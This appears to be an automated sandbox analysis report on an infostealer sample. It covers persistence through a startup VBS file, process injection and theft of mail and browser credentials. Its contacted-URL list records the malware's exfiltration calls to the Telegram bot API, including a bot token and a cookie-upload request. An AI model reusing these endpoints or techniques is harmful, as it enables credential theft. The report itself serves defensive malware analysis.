Source: Yara match File source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3507858654.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6952, type: MEMORYSTR
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1651012 Sample: SKM_72059114803.exe Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 29 reallyfreegeoip.org 2->29 31 api.telegram.org 2->31 33 3 other IPs or domains 2->33 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 51 11 other signatures 2->51 8 SKM_72059114803.exe 5 2->8         started        12 wscript.exe 1 2->12         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 29->47 49 Uses the Telegram API (likely for C&C communication) 31->49 process4 file5 23 C:\Users\user\AppData\...\InnerException.exe, PE32 8->23 dropped 25 C:\Users\user\AppData\...\InnerException.vbs, ASCII 8->25 dropped 27 C:\...\InnerException.exe:Zone.Identifier, ASCII 8->27 dropped 57 Drops VBS files to the startup folder 8->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->59 61 Writes to foreign memory regions 8->61 63 Injects a PE file into a foreign processes 8->63 14 InstallUtil.exe 15 2 8->14         started        65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->65 18 InnerException.exe 2 12->18         started        signatures6 process7 dnsIp8 35 mail.hectronica.com 194.164.173.199, 49703, 49729, 587 KCOM-SPNService-ProviderNetworkex-MistralGB United Kingdom 14->35 37 api.telegram.org 149.154.167.220, 443, 49698, 49718 TELEGRAMRU United Kingdom 14->37 39 2 other IPs or domains 14->39 67 Tries to steal Mail credentials (via file / registry access) 14->67 69 Multi AV Scanner detection for dropped file 18->69 71 Writes to foreign memory regions 18->71 73 Injects a PE file into a foreign processes 18->73 20 InstallUtil.exe 2 18->20         started        signatures9 process10 signatures11 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
194.164.173.199
 mail.hectronica.com United Kingdom
8897 KCOM-SPNService-ProviderNetworkex-MistralGB true
104.21.96.1
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 104.21.96.1 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
mail.hectronica.com 194.164.173.199 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://checkip.dyndns.org/ false
    		high
    https://reallyfreegeoip.org/xml/45.92.229.138 false
      		high
      https://api.telegram.org/bot7421040663:AAHWz1-Vh4xaZ359u0SLW1wM-t0JifGdJa8/sendDocument?chat_id=1443320838&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery false
        		high
        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:134349%0D%0ADate%20and%20Time:%2028/03/2025%20/%2012:50:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20134349%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
          		high
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:134349%0D%0ADate%20and%20Time:%2028/03/2025%20/%2013:10:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20134349%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
            		high